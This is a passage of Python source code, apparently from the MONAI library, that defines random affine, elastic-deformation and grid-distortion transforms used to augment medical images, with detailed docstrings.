                `spatial_size=(32, -1)` becomes `(32, 64)` for an input whose second spatial
                dim is `64`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
                When `USE_COMPILED` is `True`, this argument uses
                ``"nearest"``, ``"bilinear"``, ``"bicubic"`` to indicate 0, 1, 3 order interpolations.
                See also: https://docs.monai.io/en/stable/networks.html#grid-pull
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"reflection"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            norm_coords: whether the resampler should normalize grid coordinates from
                `[-(size-1)/2, (size-1)/2]` to `[0, size - 1]` or `[-1, 1]` for the underlying
                API. Use ``True`` for grids from ``monai.transforms.utils.create_grid`` whose
                ``affine`` does not include the normalization; ``False`` when the grid is
                already normalized.
            device: device on which the tensor will be allocated.
            dtype: data type for resampling computation. Defaults to ``np.float32``.
                If ``None``, use the data type of input data. To be compatible with other
                modules, the output data type is always `float32`.
            image_only: if True return only the image volume, otherwise return (image, affine).

        .. deprecated:: 0.6.0
            ``as_tensor_output`` is deprecated.

        """
        self.image_only = image_only
        self.spatial_size = spatial_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        # grid generation and resampling are delegated to the two stateless helpers below
        self.affine_grid = AffineGrid(
            rotate_params=rotate_params,
            shear_params=shear_params,
            translate_params=translate_params,
            scale_params=scale_params,
            affine=affine,
            dtype=dtype,
            device=device,
        )
        self.resampler = Resample(norm_coords=norm_coords, device=device, dtype=dtype)

    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
    ) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor]]:
        """
        Args:
            img: shape must be (num_channels, H, W[, D]).
            spatial_size: output image spatial size; falls back to `self.spatial_size` and
                then to the input's spatial size when unset or smaller than 1. Must have 2
                elements [h, w] for 2D inputs and 3 elements [h, w, d] for 3D inputs.
            mode: {``"bilinear"``, ``"nearest"``} interpolation override, defaults to
                ``self.mode``. See also:
                https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``} override, defaults to
                ``self.padding_mode``. See also:
                https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        """
        out_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        grid, affine = self.affine_grid(spatial_size=out_size)
        resampled = self.resampler(
            img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        if self.image_only:
            return resampled
        return resampled, affine
class RandAffine(RandomizableTransform):
    """
    Random affine transform.
    A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
    """

    backend = Affine.backend

    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        prob: float = 0.1,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        cache_grid: bool = False,
        as_tensor_output: bool = True,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            prob: probability of returning a randomized affine grid.
                defaults to 0.1, with 10% chance returns a randomized grid.
            rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
                `uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
                for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
                This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
                in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
                for dim0 and nothing for the remaining dimensions.
            shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
                shearing factors(a tuple of 2 floats for 2D, a tuple of 6 floats for 3D) for affine matrix,
                take a 3D affine as example::

                    [
                        [1.0, params[0], params[1], 0.0],
                        [params[2], 1.0, params[3], 0.0],
                        [params[4], params[5], 1.0, 0.0],
                        [0.0, 0.0, 0.0, 1.0],
                    ]

            translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
                select pixel/voxel to translate for every spatial dims.
            scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
                the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
                This allows 0 to correspond to no change (i.e., a scaling of 1.0).
            spatial_size: output image spatial size.
                if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
                the transform will use the spatial size of `img`.
                if some components of the `spatial_size` are non-positive values, the transform will use the
                corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
                to `(32, 64)` if the second spatial dimension size of img is `64`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"reflection"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            cache_grid: whether to cache the identity sampling grid.
                If the spatial size is not dynamically defined by input image, enabling this option could
                accelerate the transform.
            device: device on which the tensor will be allocated.

        See also:
            - :py:class:`RandAffineGrid` for the random affine parameters configurations.
            - :py:class:`Affine` for the affine transformation parameters configurations.

        .. deprecated:: 0.6.0
            ``as_tensor_output`` is deprecated.

        """
        RandomizableTransform.__init__(self, prob)

        self.rand_affine_grid = RandAffineGrid(
            rotate_range=rotate_range,
            shear_range=shear_range,
            translate_range=translate_range,
            scale_range=scale_range,
            device=device,
        )
        self.resampler = Resample(device=device)

        self.spatial_size = spatial_size
        self.cache_grid = cache_grid
        # built once here; None when the spatial size is dynamic (see _init_identity_cache)
        self._cached_grid = self._init_identity_cache()
        self.mode: GridSampleMode = GridSampleMode(mode)
        self.padding_mode: GridSamplePadMode = GridSamplePadMode(padding_mode)

    def _init_identity_cache(self):
        """
        Create cache of the identity grid if cache_grid=True and spatial_size is known.

        Returns ``None`` (with a warning when ``cache_grid=True``) if the spatial size is
        dynamic, i.e. it depends on the input image at call time.
        """
        if self.spatial_size is None:
            if self.cache_grid:
                warnings.warn(
                    "cache_grid=True is not compatible with the dynamic spatial_size, please specify 'spatial_size'."
                )
            return None
        _sp_size = ensure_tuple(self.spatial_size)
        _ndim = len(_sp_size)
        # `fall_back_tuple` replaces non-positive components with the given defaults:
        # comparing against two different defaults detects any component that would be
        # substituted at run time, i.e. a dynamic spatial size.
        if _sp_size != fall_back_tuple(_sp_size, [1] * _ndim) or _sp_size != fall_back_tuple(_sp_size, [2] * _ndim):
            # dynamic shape because it falls back to different outcomes
            if self.cache_grid:
                warnings.warn(
                    "cache_grid=True is not compatible with the dynamic spatial_size "
                    f"'spatial_size={self.spatial_size}', please specify 'spatial_size'."
                )
            return None
        return create_grid(spatial_size=_sp_size, device=self.rand_affine_grid.device, backend="torch")

    def get_identity_grid(self, spatial_size: Sequence[int]):
        """
        Return a cached or new identity grid depends on the availability.

        Args:
            spatial_size: non-dynamic spatial size

        Raises:
            RuntimeError: when ``spatial_size`` contains dynamic (non-positive) components.
        """
        ndim = len(spatial_size)
        if spatial_size != fall_back_tuple(spatial_size, [1] * ndim) or spatial_size != fall_back_tuple(
            spatial_size, [2] * ndim
        ):
            raise RuntimeError(f"spatial_size should not be dynamic, got {spatial_size}.")
        return (
            create_grid(spatial_size=spatial_size, device=self.rand_affine_grid.device, backend="torch")
            if self._cached_grid is None
            else self._cached_grid
        )

    def set_random_state(
        self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
    ) -> "RandAffine":
        # keep the nested grid generator in sync with this transform's RNG
        self.rand_affine_grid.set_random_state(seed, state)
        super().set_random_state(seed, state)
        return self

    def randomize(self, data: Optional[Any] = None) -> None:
        super().randomize(None)
        if not self._do_transform:
            return None
        self.rand_affine_grid.randomize()

    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Sequence[int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: shape must be (num_channels, H, W[, D]),
            spatial_size: output image spatial size.
                if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
                the transform will use the spatial size of `img`.
                if `img` has two spatial dimensions, `spatial_size` should have 2 elements [h, w].
                if `img` has three spatial dimensions, `spatial_size` should have 3 elements [h, w, d].
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            randomize: whether to execute `randomize()` function first, default to True.
        """
        if randomize:
            self.randomize()
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        do_resampling = self._do_transform or (sp_size != ensure_tuple(img.shape[1:]))
        if not do_resampling:
            # not doing the random transform and the spatial size doesn't change:
            # nothing to resample — convert to float32 on the target device and return,
            # skipping the needless (and lossy) identity-grid interpolation.
            img, *_ = convert_data_type(img, dtype=torch.float32, device=self.resampler.device)
            return img
        grid = self.get_identity_grid(sp_size)
        if self._do_transform:
            grid = self.rand_affine_grid(grid=grid)
        out: NdarrayOrTensor = self.resampler(
            img=img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        return out
class Rand2DElastic(RandomizableTransform):
    """
    Random elastic deformation and affine in 2D.
    A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
    """
    backend = Resample.backend
    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        spacing: Union[Tuple[float, float], float],
        magnitude_range: Tuple[float, float],
        prob: float = 0.1,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        spatial_size: Optional[Union[Tuple[int, int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        as_tensor_output: bool = False,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            spacing : distance in between the control points.
            magnitude_range: the random offsets will be generated from ``uniform[magnitude[0], magnitude[1])``.
            prob: probability of returning a randomized elastic transform.
                defaults to 0.1, with 10% chance returns a randomized elastic transform,
                otherwise returns a ``spatial_size`` centered area extracted from the input image.
            rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
                `uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
                for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
                This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
                in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
                for dim0 and nothing for the remaining dimensions.
            shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
                shearing factors(a tuple of 2 floats for 2D) for affine matrix, take a 2D affine as example::
                    [
                        [1.0, params[0], 0.0],
                        [params[1], 1.0, 0.0],
                        [0.0, 0.0, 1.0],
                    ]
            translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
                select pixel to translate for every spatial dims.
            scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
                the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
                This allows 0 to correspond to no change (i.e., a scaling of 1.0).
            spatial_size: specifying output image spatial size [h, w].
                if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
                the transform will use the spatial size of `img`.
                if some components of the `spatial_size` are non-positive values, the transform will use the
                corresponding components of img size. For example, `spatial_size=(32, -1)` will be adapted
                to `(32, 64)` if the second spatial dimension size of img is `64`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"reflection"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            device: device on which the tensor will be allocated.
        See also:
            - :py:class:`RandAffineGrid` for the random affine parameters configurations.
            - :py:class:`Affine` for the affine transformation parameters configurations.
        .. deprecated:: 0.6.0
            ``as_tensor_output`` is deprecated.
        """
        RandomizableTransform.__init__(self, prob)
        # coarse random-offset grid; offsets are later upsampled to the output resolution
        self.deform_grid = RandDeformGrid(
            spacing=spacing, magnitude_range=magnitude_range, as_tensor_output=True, device=device
        )
        # random affine applied on top of the elastic deformation
        self.rand_affine_grid = RandAffineGrid(
            rotate_range=rotate_range,
            shear_range=shear_range,
            translate_range=translate_range,
            scale_range=scale_range,
            device=device,
        )
        self.resampler = Resample(device=device)
        self.device = device
        self.spatial_size = spatial_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
    def set_random_state(
        self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
    ) -> "Rand2DElastic":
        # propagate the seed/state to the component transforms so that the deformation
        # grid and the affine parameters are reproducible together
        self.deform_grid.set_random_state(seed, state)
        self.rand_affine_grid.set_random_state(seed, state)
        super().set_random_state(seed, state)
        return self
    def randomize(self, spatial_size: Sequence[int]) -> None:
        # decide (based on `prob`) whether this call applies the transform
        super().randomize(None)
        if not self._do_transform:
            return None
        # sample new deformation offsets and affine parameters
        self.deform_grid.randomize(spatial_size)
        self.rand_affine_grid.randomize()
    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Tuple[int, int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: shape must be (num_channels, H, W),
            spatial_size: specifying output image spatial size [h, w].
                if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
                the transform will use the spatial size of `img`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            randomize: whether to execute `randomize()` function first, default to True.
        """
        # resolve the output spatial size, falling back to the input image size
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        if randomize:
            self.randomize(spatial_size=sp_size)
        if self._do_transform:
            # deform a coarse control grid, apply the random affine to it, then
            # upsample the grid to the output resolution with bicubic interpolation
            grid = self.deform_grid(spatial_size=sp_size)
            grid = self.rand_affine_grid(grid=grid)
            grid = torch.nn.functional.interpolate(  # type: ignore
                recompute_scale_factor=True,
                input=grid.unsqueeze(0),
                scale_factor=list(ensure_tuple(self.deform_grid.spacing)),
                mode=InterpolateMode.BICUBIC.value,
                align_corners=False,
            )
            # crop the (possibly larger) upsampled grid back to the exact output size
            grid = CenterSpatialCrop(roi_size=sp_size)(grid[0])
        else:
            # no randomized transform: resample through an identity grid
            # (this may still resize/crop to `sp_size`)
            _device = img.device if isinstance(img, torch.Tensor) else self.device
            grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
        out: NdarrayOrTensor = self.resampler(
            img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        return out
class Rand3DElastic(RandomizableTransform):
    """
    Random elastic deformation and affine in 3D.
    A tutorial is available: https://github.com/Project-MONAI/tutorials/blob/0.6.0/modules/transforms_demo_2d.ipynb.
    """
    backend = Resample.backend
    @deprecated_arg(name="as_tensor_output", since="0.6")
    def __init__(
        self,
        sigma_range: Tuple[float, float],
        magnitude_range: Tuple[float, float],
        prob: float = 0.1,
        rotate_range: RandRange = None,
        shear_range: RandRange = None,
        translate_range: RandRange = None,
        scale_range: RandRange = None,
        spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
        as_tensor_output: bool = False,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Args:
            sigma_range: a Gaussian kernel with standard deviation sampled from
                ``uniform[sigma_range[0], sigma_range[1])`` will be used to smooth the random offset grid.
            magnitude_range: the random offsets on the grid will be generated from
                ``uniform[magnitude[0], magnitude[1])``.
            prob: probability of returning a randomized elastic transform.
                defaults to 0.1, with 10% chance returns a randomized elastic transform,
                otherwise returns a ``spatial_size`` centered area extracted from the input image.
            rotate_range: angle range in radians. If element `i` is a pair of (min, max) values, then
                `uniform[-rotate_range[i][0], rotate_range[i][1])` will be used to generate the rotation parameter
                for the `i`th spatial dimension. If not, `uniform[-rotate_range[i], rotate_range[i])` will be used.
                This can be altered on a per-dimension basis. E.g., `((0,3), 1, ...)`: for dim0, rotation will be
                in range `[0, 3]`, and for dim1 `[-1, 1]` will be used. Setting a single value will use `[-x, x]`
                for dim0 and nothing for the remaining dimensions.
            shear_range: shear range with format matching `rotate_range`, it defines the range to randomly select
                shearing factors(a tuple of 6 floats for 3D) for affine matrix, take a 3D affine as example::
                    [
                        [1.0, params[0], params[1], 0.0],
                        [params[2], 1.0, params[3], 0.0],
                        [params[4], params[5], 1.0, 0.0],
                        [0.0, 0.0, 0.0, 1.0],
                    ]
            translate_range: translate range with format matching `rotate_range`, it defines the range to randomly
                select voxel to translate for every spatial dims.
            scale_range: scaling range with format matching `rotate_range`. it defines the range to randomly select
                the scale factor to translate for every spatial dims. A value of 1.0 is added to the result.
                This allows 0 to correspond to no change (i.e., a scaling of 1.0).
            spatial_size: specifying output image spatial size [h, w, d].
                if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
                the transform will use the spatial size of `img`.
                if some components of the `spatial_size` are non-positive values, the transform will use the
                corresponding components of img size. For example, `spatial_size=(32, 32, -1)` will be adapted
                to `(32, 32, 64)` if the third spatial dimension size of img is `64`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"reflection"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            device: device on which the tensor will be allocated.
        See also:
            - :py:class:`RandAffineGrid` for the random affine parameters configurations.
            - :py:class:`Affine` for the affine transformation parameters configurations.
        .. deprecated:: 0.6.0
            ``as_tensor_output`` is deprecated.
        """
        RandomizableTransform.__init__(self, prob)
        # random affine applied on top of the smoothed random-offset deformation
        self.rand_affine_grid = RandAffineGrid(
            rotate_range=rotate_range,
            shear_range=shear_range,
            translate_range=translate_range,
            scale_range=scale_range,
            device=device,
        )
        self.resampler = Resample(device=device)
        self.sigma_range = sigma_range
        self.magnitude_range = magnitude_range
        self.spatial_size = spatial_size
        self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
        self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
        self.device = device
        # `rand_offset` is only populated by `randomize()`. Initialize it to an explicit
        # None so the guard in `__call__` can detect "not yet randomized". (Previously
        # this was a bare annotation without assignment, which made the `is None` check
        # unreachable and turned early access into an AttributeError instead of the
        # intended RuntimeError.)
        self.rand_offset: Optional[np.ndarray] = None
        self.magnitude = 1.0
        self.sigma = 1.0
    def set_random_state(
        self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
    ) -> "Rand3DElastic":
        # propagate the seed/state to the affine component so results are reproducible
        self.rand_affine_grid.set_random_state(seed, state)
        super().set_random_state(seed, state)
        return self
    def randomize(self, grid_size: Sequence[int]) -> None:
        # decide (based on `prob`) whether this call applies the transform
        super().randomize(None)
        if not self._do_transform:
            return None
        # per-voxel random offsets in [-1, 1) for each of the 3 spatial axes
        self.rand_offset = self.R.uniform(-1.0, 1.0, [3] + list(grid_size)).astype(np.float32, copy=False)
        self.magnitude = self.R.uniform(self.magnitude_range[0], self.magnitude_range[1])
        self.sigma = self.R.uniform(self.sigma_range[0], self.sigma_range[1])
        self.rand_affine_grid.randomize()
    def __call__(
        self,
        img: NdarrayOrTensor,
        spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: shape must be (num_channels, H, W, D),
            spatial_size: specifying spatial 3D output image spatial size [h, w, d].
                if `spatial_size` and `self.spatial_size` are not defined, or smaller than 1,
                the transform will use the spatial size of `img`.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``self.mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``self.padding_mode``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            randomize: whether to execute `randomize()` function first, default to True.

        Raises:
            RuntimeError: when the transform should be applied but `randomize()` has
                never been called (i.e. no random offsets are available).
        """
        # resolve the output spatial size, falling back to the input image size
        sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
        if randomize:
            self.randomize(grid_size=sp_size)
        _device = img.device if isinstance(img, torch.Tensor) else self.device
        grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
        if self._do_transform:
            if self.rand_offset is None:
                raise RuntimeError("rand_offset is not initialized.")
            # smooth the raw offsets with a Gaussian and scale by the sampled magnitude
            gaussian = GaussianFilter(3, self.sigma, 3.0).to(device=_device)
            offset = torch.as_tensor(self.rand_offset, device=_device).unsqueeze(0)
            grid[:3] += gaussian(offset)[0] * self.magnitude
            grid = self.rand_affine_grid(grid=grid)
        out: NdarrayOrTensor = self.resampler(
            img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
        )
        return out
class GridDistortion(Transform):
    """Deterministic grid-distortion transform; see `__init__` for details."""
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        num_cells: Union[Tuple[int], int],
        distort_steps: Sequence[Sequence[float]],
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Grid distortion transform. Refer to:
        https://github.com/albumentations-team/albumentations/blob/master/albumentations/augmentations/transforms.py
        Args:
            num_cells: number of grid cells on each dimension.
            distort_steps: This argument is a list of tuples, where each tuple contains the distort steps of the
                corresponding dimensions (in the order of H, W[, D]). The length of each tuple equals to `num_cells + 1`.
                Each value in the tuple represents the distort step of the related cell.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            device: device on which the tensor will be allocated.
        """
        self.resampler = Resample(mode=mode, padding_mode=padding_mode, device=device)
        self.num_cells = num_cells
        self.distort_steps = distort_steps
        self.device = device
    def __call__(
        self,
        img: NdarrayOrTensor,
        distort_steps: Optional[Sequence[Sequence]] = None,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: shape must be (num_channels, H, W[, D]).
            distort_steps: This argument is a list of tuples, where each tuple contains the distort steps of the
                corresponding dimensions (in the order of H, W[, D]). The length of each tuple equals to `num_cells + 1`.
                Each value in the tuple represents the distort step of the related cell.
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
        """
        distort_steps = self.distort_steps if distort_steps is None else distort_steps
        if len(img.shape) != len(distort_steps) + 1:
            raise ValueError("the spatial size of `img` does not match with the length of `distort_steps`")
        all_ranges = []
        num_cells = ensure_tuple_rep(self.num_cells, len(img.shape) - 1)
        # build, per spatial dimension, the distorted 1-D sampling coordinates
        for dim_idx, dim_size in enumerate(img.shape[1:]):
            dim_distort_steps = distort_steps[dim_idx]
            ranges = torch.zeros(dim_size, dtype=torch.float32)
            cell_size = dim_size // num_cells[dim_idx]
            prev = 0
            for idx in range(num_cells[dim_idx] + 1):
                start = int(idx * cell_size)
                end = start + cell_size
                if end > dim_size:
                    # last (partial) cell: clamp the coordinates at the dimension end
                    end = dim_size
                    cur = dim_size
                else:
                    # stretch/compress this cell by its distort step
                    cur = prev + cell_size * dim_distort_steps[idx]
                ranges[start:end] = torch.linspace(prev, cur, end - start)
                prev = cur
            # center the coordinates around 0 (grid convention used by the resampler)
            ranges = ranges - (dim_size - 1.0) / 2.0
            all_ranges.append(ranges)
        # combine per-dimension coordinates into a dense grid, plus a homogeneous row of ones
        coords = meshgrid_ij(*all_ranges)
        grid = torch.stack([*coords, torch.ones_like(coords[0])])
        return self.resampler(img, grid=grid, mode=mode, padding_mode=padding_mode)  # type: ignore
class RandGridDistortion(RandomizableTransform):
    """Randomized version of :py:class:`GridDistortion`; see `__init__` for details."""
    backend = [TransformBackends.TORCH]
    def __init__(
        self,
        num_cells: Union[Tuple[int], int] = 5,
        prob: float = 0.1,
        distort_limit: Union[Tuple[float, float], float] = (-0.03, 0.03),
        mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
        padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
        device: Optional[torch.device] = None,
    ) -> None:
        """
        Random grid distortion transform. Refer to:
        https://github.com/albumentations-team/albumentations/blob/master/albumentations/augmentations/transforms.py
        Args:
            num_cells: number of grid cells on each dimension.
            prob: probability of returning a randomized grid distortion transform. Defaults to 0.1.
            distort_limit: range to randomly distort.
                If single number, distort_limit is picked from (-distort_limit, distort_limit).
                Defaults to (-0.03, 0.03).
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            device: device on which the tensor will be allocated.
        """
        RandomizableTransform.__init__(self, prob)
        self.num_cells = num_cells
        # normalize `distort_limit` to an ordered (low, high) pair
        if isinstance(distort_limit, (int, float)):
            self.distort_limit = (min(-distort_limit, distort_limit), max(-distort_limit, distort_limit))
        else:
            self.distort_limit = (min(distort_limit), max(distort_limit))
        # placeholder steps; real values are sampled by `randomize()`
        self.distort_steps: Sequence[Sequence[float]] = ((1.0,),)
        self.grid_distortion = GridDistortion(
            num_cells=num_cells, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode, device=device
        )
    def randomize(self, spatial_shape: Sequence[int]) -> None:
        # decide (based on `prob`) whether this call applies the transform
        super().randomize(None)
        if not self._do_transform:
            return
        # sample one distort step per cell boundary (num_cells + 1) per spatial dimension,
        # centered around 1.0 so a zero draw leaves the grid undistorted
        self.distort_steps = tuple(
            tuple(1.0 + self.R.uniform(low=self.distort_limit[0], high=self.distort_limit[1], size=n_cells + 1))
            for n_cells in ensure_tuple_rep(self.num_cells, len(spatial_shape))
        )
    def __call__(
        self,
        img: NdarrayOrTensor,
        mode: Optional[Union[GridSampleMode, str]] = None,
        padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
        randomize: bool = True,
    ) -> NdarrayOrTensor:
        """
        Args:
            img: shape must be (num_channels, H, W[, D]).
            mode: {``"bilinear"``, ``"nearest"``}
                Interpolation mode to calculate output values. Defaults to ``"bilinear"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            padding_mode: {``"zeros"``, ``"border"``, ``"reflection"``}
                Padding mode for outside grid values. Defaults to ``"border"``.
                See also: https://pytorch.org/docs/stable/generated/torch.nn.functional.grid_sample.html
            randomize: whether to shuffle the random factors using `randomize()`, default to True.
        """
        if randomize:
            self.randomize(img.shape[1:])
        if not self._do_transform:
            # not selected this call: return the input unchanged
            return img
        return self.grid_distortion(img, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode)
| 49.480309 | 129 | 0.622951 |
import warnings
